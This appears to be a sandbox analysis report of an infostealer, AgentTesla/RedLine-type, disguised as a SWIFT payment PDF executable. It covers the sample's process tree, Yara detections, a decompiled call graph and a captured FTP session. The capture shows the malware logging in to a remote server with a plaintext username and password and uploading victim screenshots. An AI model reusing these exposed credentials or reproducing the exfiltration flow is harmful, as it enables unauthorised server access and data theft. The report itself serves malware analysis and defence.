                                                      Oct 29, 2024 02:35:10.241976023 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,203,57)
                                                      Oct 29, 2024 02:35:10.247965097 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_02_12_07_16_22.jpeg
                                                      Oct 29, 2024 02:35:11.185020924 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:12.002187967 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.813 seconds (measured here), 69.13 Kbytes per second
                                                      Oct 29, 2024 02:35:16.210088015 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:35:16.556471109 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,198,142)
                                                      Oct 29, 2024 02:35:16.562556028 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_02_17_07_15_41.jpeg
                                                      Oct 29, 2024 02:35:17.492052078 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:18.294337034 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.801 seconds (measured here), 70.10 Kbytes per second
                                                      Oct 29, 2024 02:35:19.783720970 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:35:20.130256891 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,201,205)
                                                      Oct 29, 2024 02:35:20.141165018 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_02_21_03_40_49.jpeg
                                                      Oct 29, 2024 02:35:21.061619997 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:21.846056938 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.786 seconds (measured here), 71.46 Kbytes per second
                                                      Oct 29, 2024 02:35:25.908178091 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:35:26.254410028 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,211,80)
                                                      Oct 29, 2024 02:35:26.260390043 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_02_26_01_27_20.jpeg
                                                      Oct 29, 2024 02:35:27.200771093 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:28.020596027 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.820 seconds (measured here), 68.54 Kbytes per second
                                                      Oct 29, 2024 02:35:32.681978941 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:35:33.030200005 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,208,25)
                                                      Oct 29, 2024 02:35:33.036204100 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_03_03_06_46_27.jpeg
                                                      Oct 29, 2024 02:35:33.933451891 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:34.691622972 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.758 seconds (measured here), 74.15 Kbytes per second
                                                      Oct 29, 2024 02:35:44.425179958 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:35:44.771503925 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,236,178)
                                                      Oct 29, 2024 02:35:44.777484894 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_03_10_18_55_13.jpeg
                                                      Oct 29, 2024 02:35:45.687220097 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:46.467407942 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.780 seconds (measured here), 72.00 Kbytes per second
                                                      Oct 29, 2024 02:35:55.392965078 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:35:55.739581108 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,245,86)
                                                      Oct 29, 2024 02:35:55.746367931 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_03_23_18_36_53.jpeg
                                                      Oct 29, 2024 02:35:56.338201046 CET2150038110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.220-Local time is now 09:35. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.220-Local time is now 09:35. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.220-Local time is now 09:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.220-Local time is now 09:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                      Oct 29, 2024 02:35:56.338327885 CET5003821192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                      Oct 29, 2024 02:35:56.677062988 CET2150038110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                      Oct 29, 2024 02:35:56.677232981 CET5003821192.168.2.4110.4.45.197PASS JesusChrist007$
                                                      Oct 29, 2024 02:35:56.677886009 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:57.032310963 CET2150038110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                      Oct 29, 2024 02:35:57.378309011 CET2150038110.4.45.197192.168.2.4504 Unknown command
                                                      Oct 29, 2024 02:35:57.378534079 CET5003821192.168.2.4110.4.45.197PWD
                                                      Oct 29, 2024 02:35:57.488614082 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.810 seconds (measured here), 69.34 Kbytes per second
                                                      Oct 29, 2024 02:35:57.716907024 CET2150038110.4.45.197192.168.2.4257 "/" is your current location
                                                      Oct 29, 2024 02:35:57.717506886 CET5003821192.168.2.4110.4.45.197TYPE I
                                                      Oct 29, 2024 02:35:58.056058884 CET2150038110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                      Oct 29, 2024 02:35:58.058168888 CET5003821192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:35:58.400824070 CET2150038110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,207,162)
                                                      Oct 29, 2024 02:35:58.406735897 CET5003821192.168.2.4110.4.45.197STOR SC_user-965969_2025_03_23_18_57_14.jpeg
                                                      Oct 29, 2024 02:35:59.324969053 CET2150038110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:36:00.104688883 CET2150038110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.781 seconds (measured here), 71.95 Kbytes per second
                                                      Oct 29, 2024 02:36:01.706073999 CET5003821192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:36:01.769079924 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:36:02.044780970 CET2150038110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,248,118)
                                                      Oct 29, 2024 02:36:02.115873098 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,250,227)
                                                      Oct 29, 2024 02:36:02.704581022 CET5003821192.168.2.4110.4.45.197STOR SC_user-965969_2025_03_28_17_51_37.jpeg
                                                      Oct 29, 2024 02:36:02.704750061 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_03_30_23_17_03.jpeg
                                                      Oct 29, 2024 02:36:03.088249922 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:36:03.114332914 CET2150038110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:36:03.839689016 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.751 seconds (measured here), 74.78 Kbytes per second
                                                      Oct 29, 2024 02:36:03.928092003 CET2150038110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.819 seconds (measured here), 68.57 Kbytes per second
                                                      Oct 29, 2024 02:36:04.049911022 CET5003821192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:36:04.388629913 CET2150038110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,200,158)
                                                      Oct 29, 2024 02:36:04.394699097 CET5003821192.168.2.4110.4.45.197STOR SC_user-965969_2025_04_02_19_33_44.jpeg
                                                      Oct 29, 2024 02:36:05.293621063 CET2150038110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:36:06.365060091 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:36:06.712308884 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,237,36)
                                                      Oct 29, 2024 02:36:06.718624115 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2024_10_28_21_36_05.jpeg
                                                      Oct 29, 2024 02:36:07.065848112 CET2150038110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 1.771 seconds (measured here), 31.72 Kbytes per second
                                                      Oct 29, 2024 02:36:07.634350061 CET2150024110.4.45.197192.168.2.4150 Accepted data connection

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:21:31:57
                                                      Start date:28/10/2024
                                                      Path:C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe"
                                                      Imagebase:0x400000
                                                      File size:1'286'373 bytes
                                                      MD5 hash:7251AEF1D7960BE902F604768FF93A1A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1717405576.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:21:31:59
                                                      Start date:28/10/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe"
                                                      Imagebase:0x660000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.4153975338.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4156259862.0000000002CD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4156259862.0000000002CD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:21:32:15
                                                      Start date:28/10/2024
                                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                      Imagebase:0x510000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 0%, ReversingLabs
                                                      • Detection: 0%, Virustotal, Browse
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:21:32:15
                                                      Start date:28/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:21:32:23
                                                      Start date:28/10/2024
                                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                      Imagebase:0xfa0000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:21:32:23
                                                      Start date:28/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.4%
                                                        Dynamic/Decrypted Code Coverage:2.3%
                                                        Signature Coverage:5.2%
                                                        Total number of Nodes:1764
                                                        Total number of Limit Nodes:39
                                                        execution_graph 83074 3f23dd3 83075 3f23de8 83074->83075 83083 3f21478 83075->83083 83077 3f23df4 83078 3f23e12 83077->83078 83079 3f23ea8 83077->83079 83086 3f23ab8 83078->83086 83099 3f24758 9 API calls 83079->83099 83082 3f23e8f 83100 3f24968 GetPEB 83083->83100 83085 3f21b03 83085->83077 83087 3f21478 GetPEB 83086->83087 83090 3f23b57 83087->83090 83089 3f23b88 CreateFileW 83089->83090 83092 3f23b95 83089->83092 83091 3f23bb1 VirtualAlloc 83090->83091 83090->83092 83097 3f23cb8 CloseHandle 83090->83097 83098 3f23cc8 VirtualFree 83090->83098 83102 3f249c8 GetPEB 83090->83102 83091->83092 83093 3f23bd2 ReadFile 83091->83093 83094 3f23db2 83092->83094 83095 3f23da4 VirtualFree 83092->83095 83093->83092 83096 3f23bf0 VirtualAlloc 83093->83096 83094->83082 83095->83094 83096->83090 83096->83092 83097->83090 83098->83090 83099->83082 83101 3f24992 83100->83101 83101->83085 83103 3f249f2 83102->83103 83103->83089 83104 4161c2 83105 4161d3 83104->83105 83139 41aa31 HeapCreate 83105->83139 83108 416212 83141 416e29 GetModuleHandleW 83108->83141 83113 416223 __RTC_Initialize 83175 41b669 83113->83175 83115 416231 83116 41623d GetCommandLineW 83115->83116 83244 4117af 67 API calls 3 library calls 83115->83244 83190 42235f GetEnvironmentStringsW 83116->83190 83119 41623c 83119->83116 83120 41624c 83196 4222b1 GetModuleFileNameW 83120->83196 83122 416256 83123 416261 83122->83123 83245 4117af 67 API calls 3 library calls 83122->83245 83200 422082 83123->83200 83127 416272 83213 41186e 83127->83213 83130 416279 83132 416284 __wwincmdln 83130->83132 83247 4117af 67 API calls 3 library calls 83130->83247 83219 40d7f0 83132->83219 83135 4162b3 83249 411a4b 67 API calls _doexit 83135->83249 83138 4162b8 __locking 83140 416206 83139->83140 83140->83108 83242 41616a 67 API calls 3 library calls 83140->83242 83142 416e44 83141->83142 83143 416e3d 83141->83143 83145 416fac 83142->83145 83146 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 83142->83146 83250 41177f Sleep GetModuleHandleW 83143->83250 83280 416ad5 70 API calls 2 library calls 83145->83280 83149 416e97 TlsAlloc 83146->83149 83148 416e43 83148->83142 83151 416218 83149->83151 83152 416ee5 TlsSetValue 83149->83152 83151->83113 83243 41616a 67 API calls 3 library calls 83151->83243 83152->83151 83153 416ef6 83152->83153 83251 411a69 6 API calls 3 library calls 83153->83251 83155 416efb 83252 41696e TlsGetValue 83155->83252 83158 41696e __encode_pointer 6 API calls 83159 416f16 83158->83159 83160 41696e __encode_pointer 6 API calls 83159->83160 83161 416f26 83160->83161 83162 41696e __encode_pointer 6 API calls 83161->83162 83163 416f36 83162->83163 83262 41828b InitializeCriticalSectionAndSpinCount ___lock_fhandle 83163->83262 83165 416f43 83165->83145 83263 4169e9 TlsGetValue 83165->83263 83170 4169e9 __decode_pointer 6 API calls 83171 416f8a 83170->83171 83171->83145 83172 416f91 83171->83172 83279 416b12 67 API calls 5 library calls 83172->83279 83174 416f99 GetCurrentThreadId 83174->83151 83393 41718c 83175->83393 83177 41b675 GetStartupInfoA 83178 416ffb __calloc_crt 67 API calls 83177->83178 83181 41b696 83178->83181 83179 41b8b4 __locking 83179->83115 83180 41b7fb 83180->83179 83182 41b831 GetStdHandle 83180->83182 83183 41b896 SetHandleCount 83180->83183 83185 41b843 GetFileType 83180->83185 83395 4189e6 InitializeCriticalSectionAndSpinCount __locking 83180->83395 83181->83179 83181->83180 83184 416ffb __calloc_crt 67 API calls 83181->83184 83189 41b77e 83181->83189 83182->83180 83183->83179 83184->83181 83185->83180 83186 41b7a7 GetFileType 83186->83189 83189->83179 83189->83180 83189->83186 83394 4189e6 InitializeCriticalSectionAndSpinCount __locking 83189->83394 83191 422370 83190->83191 83192 422374 83190->83192 83191->83120 83193 416fb6 __malloc_crt 67 API calls 83192->83193 83194 422395 _memcpy_s 83193->83194 83195 42239c FreeEnvironmentStringsW 83194->83195 83195->83120 83197 4222e6 _wparse_cmdline 83196->83197 83198 416fb6 __malloc_crt 67 API calls 83197->83198 83199 422329 _wparse_cmdline 83197->83199 83198->83199 83199->83122 83201 42209a _wcslen 83200->83201 83205 416267 83200->83205 83202 416ffb __calloc_crt 67 API calls 83201->83202 83208 4220be _wcslen 83202->83208 83203 422123 83204 413a88 ___convertcp 67 API calls 83203->83204 83204->83205 83205->83127 83246 4117af 67 API calls 3 library calls 83205->83246 83206 416ffb __calloc_crt 67 API calls 83206->83208 83207 422149 83209 413a88 ___convertcp 67 API calls 83207->83209 83208->83203 83208->83205 83208->83206 83208->83207 83211 422108 83208->83211 83396 426349 67 API calls __gmtime64_s 83208->83396 83209->83205 83211->83208 83397 417d93 10 API calls 3 library calls 83211->83397 83214 41187c __IsNonwritableInCurrentImage 83213->83214 83398 418486 83214->83398 83216 41189a __initterm_e 83218 4118b9 __IsNonwritableInCurrentImage __initterm 83216->83218 83402 411421 83216->83402 83218->83130 83220 431bcb 83219->83220 83221 40d80c 83219->83221 83446 4092c0 83221->83446 83223 40d847 83450 40eb50 83223->83450 83226 40d877 83453 411ac6 67 API calls 4 library calls 83226->83453 83229 40d888 83454 411b24 67 API calls __gmtime64_s 83229->83454 83231 40d891 83455 40f370 SystemParametersInfoW SystemParametersInfoW 83231->83455 83233 40d89f 83456 40d6d0 GetCurrentDirectoryW 83233->83456 83235 40d8a7 SystemParametersInfoW 83236 40d8d4 83235->83236 83237 40d8cd FreeLibrary 83235->83237 83238 4092c0 VariantClear 83236->83238 83237->83236 83239 40d8dd 83238->83239 83240 4092c0 VariantClear 83239->83240 83241 40d8e6 83240->83241 83241->83135 83248 411a1f 67 API calls _doexit 83241->83248 83242->83108 83243->83113 83244->83119 83245->83123 83246->83127 83247->83132 83248->83135 83249->83138 83250->83148 83251->83155 83253 4169a7 GetModuleHandleW 83252->83253 83254 416986 83252->83254 83256 4169c2 GetProcAddress 83253->83256 83257 4169b7 83253->83257 83254->83253 83255 416990 TlsGetValue 83254->83255 83259 41699b 83255->83259 83261 41699f 83256->83261 83281 41177f Sleep GetModuleHandleW 83257->83281 83259->83253 83259->83261 83260 4169bd 83260->83256 83260->83261 83261->83158 83262->83165 83264 416a01 83263->83264 83265 416a22 GetModuleHandleW 83263->83265 83264->83265 83268 416a0b TlsGetValue 83264->83268 83266 416a32 83265->83266 83267 416a3d GetProcAddress 83265->83267 83282 41177f Sleep GetModuleHandleW 83266->83282 83270 416a1a 83267->83270 83272 416a16 83268->83272 83270->83145 83273 416ffb 83270->83273 83271 416a38 83271->83267 83271->83270 83272->83265 83272->83270 83276 417004 83273->83276 83275 416f70 83275->83145 83275->83170 83276->83275 83277 417022 Sleep 83276->83277 83283 422452 83276->83283 83278 417037 83277->83278 83278->83275 83278->83276 83279->83174 83280->83151 83281->83260 83282->83271 83284 42245e __locking 83283->83284 83285 422476 83284->83285 83295 422495 _memset 83284->83295 83296 417f23 67 API calls __getptd_noexit 83285->83296 83287 42247b 83297 417ebb 6 API calls 2 library calls 83287->83297 83289 422507 HeapAlloc 83289->83295 83291 42248b __locking 83291->83276 83295->83289 83295->83291 83298 418407 83295->83298 83305 41a74c 5 API calls 2 library calls 83295->83305 83306 42254e LeaveCriticalSection _doexit 83295->83306 83307 411afc 6 API calls __decode_pointer 83295->83307 83296->83287 83299 41841c 83298->83299 83300 41842f EnterCriticalSection 83298->83300 83308 418344 83299->83308 83300->83295 83302 418422 83302->83300 83336 4117af 67 API calls 3 library calls 83302->83336 83304 41842e 83304->83300 83305->83295 83306->83295 83307->83295 83309 418350 __locking 83308->83309 83310 418360 83309->83310 83311 418378 83309->83311 83337 418252 67 API calls 2 library calls 83310->83337 83317 418386 __locking 83311->83317 83340 416fb6 83311->83340 83313 418365 83338 4180a7 67 API calls 7 library calls 83313->83338 83317->83302 83318 41836c 83339 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83318->83339 83319 4183a7 83321 418407 __lock 67 API calls 83319->83321 83320 418398 83346 417f23 67 API calls __getptd_noexit 83320->83346 83324 4183ae 83321->83324 83326 4183e2 83324->83326 83327 4183b6 83324->83327 83329 413a88 ___convertcp 67 API calls 83326->83329 83347 4189e6 InitializeCriticalSectionAndSpinCount __locking 83327->83347 83331 4183d3 83329->83331 83330 4183c1 83330->83331 83348 413a88 83330->83348 83362 4183fe LeaveCriticalSection _doexit 83331->83362 83334 4183cd 83361 417f23 67 API calls __getptd_noexit 83334->83361 83336->83304 83337->83313 83338->83318 83343 416fbf 83340->83343 83342 416ff5 83342->83319 83342->83320 83343->83342 83344 416fd6 Sleep 83343->83344 83363 4138ba 83343->83363 83345 416feb 83344->83345 83345->83342 83345->83343 83346->83317 83347->83330 83350 413a94 __locking 83348->83350 83349 413b0d __locking __dosmaperr 83349->83334 83350->83349 83352 418407 __lock 65 API calls 83350->83352 83360 413ad3 83350->83360 83351 413ae8 RtlFreeHeap 83351->83349 83353 413afa 83351->83353 83357 413aab ___sbh_find_block 83352->83357 83392 417f23 67 API calls __getptd_noexit 83353->83392 83355 413aff GetLastError 83355->83349 83356 413ac5 83391 413ade LeaveCriticalSection _doexit 83356->83391 83357->83356 83390 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __shift 83357->83390 83360->83349 83360->83351 83361->83331 83362->83317 83364 41396d 83363->83364 83365 4138cc 83363->83365 83388 411afc 6 API calls __decode_pointer 83364->83388 83372 413929 RtlAllocateHeap 83365->83372 83374 4138dd 83365->83374 83375 413959 83365->83375 83378 41395e 83365->83378 83380 413965 83365->83380 83384 41386b 67 API calls 4 library calls 83365->83384 83385 411afc 6 API calls __decode_pointer 83365->83385 83367 413973 83389 417f23 67 API calls __getptd_noexit 83367->83389 83372->83365 83374->83365 83381 418252 67 API calls 2 library calls 83374->83381 83382 4180a7 67 API calls 7 library calls 83374->83382 83383 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83374->83383 83386 417f23 67 API calls __getptd_noexit 83375->83386 83387 417f23 67 API calls __getptd_noexit 83378->83387 83380->83343 83381->83374 83382->83374 83384->83365 83385->83365 83386->83378 83387->83380 83388->83367 83389->83380 83390->83356 83391->83360 83392->83355 83393->83177 83394->83189 83395->83180 83396->83208 83397->83211 83399 41848c 83398->83399 83400 41696e __encode_pointer 6 API calls 83399->83400 83401 4184a4 83399->83401 83400->83399 83401->83216 83405 4113e5 83402->83405 83404 41142e 83404->83218 83406 4113f1 __locking 83405->83406 83413 41181b 83406->83413 83412 411412 __locking 83412->83404 83414 418407 __lock 67 API calls 83413->83414 83415 4113f6 83414->83415 83416 4112fa 83415->83416 83417 4169e9 __decode_pointer 6 API calls 83416->83417 83418 41130e 83417->83418 83419 4169e9 __decode_pointer 6 API calls 83418->83419 83420 41131e 83419->83420 83421 4113a1 83420->83421 83439 4170e7 68 API calls 5 library calls 83420->83439 83436 41141b 83421->83436 83423 41133c 83426 411357 83423->83426 83427 411366 83423->83427 83435 411388 83423->83435 83424 41696e __encode_pointer 6 API calls 83425 411396 83424->83425 83428 41696e __encode_pointer 6 API calls 83425->83428 83440 417047 73 API calls _realloc 83426->83440 83427->83421 83430 411360 83427->83430 83428->83421 83430->83427 83432 41137c 83430->83432 83441 417047 73 API calls _realloc 83430->83441 83434 41696e __encode_pointer 6 API calls 83432->83434 83433 411376 83433->83421 83433->83432 83434->83435 83435->83424 83442 411824 83436->83442 83439->83423 83440->83430 83441->83433 83445 41832d LeaveCriticalSection 83442->83445 83444 411420 83444->83412 83445->83444 83447 4092c8 ctype 83446->83447 83448 429db0 VariantClear 83447->83448 83449 4092d5 ctype 83447->83449 83448->83449 83449->83223 83494 40eb70 83450->83494 83453->83229 83454->83231 83455->83233 83498 401f80 83456->83498 83458 40d6f1 IsDebuggerPresent 83459 431a9d MessageBoxA 83458->83459 83460 40d6ff 83458->83460 83461 431ab6 83459->83461 83460->83461 83462 40d71f 83460->83462 83600 403e90 75 API calls 3 library calls 83461->83600 83568 40f3b0 83462->83568 83466 40d73a GetFullPathNameW 83598 401440 127 API calls _wcscat 83466->83598 83468 40d77a 83469 40d782 83468->83469 83470 431b09 SetCurrentDirectoryW 83468->83470 83471 40d78b 83469->83471 83601 43604b 6 API calls 83469->83601 83470->83469 83580 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 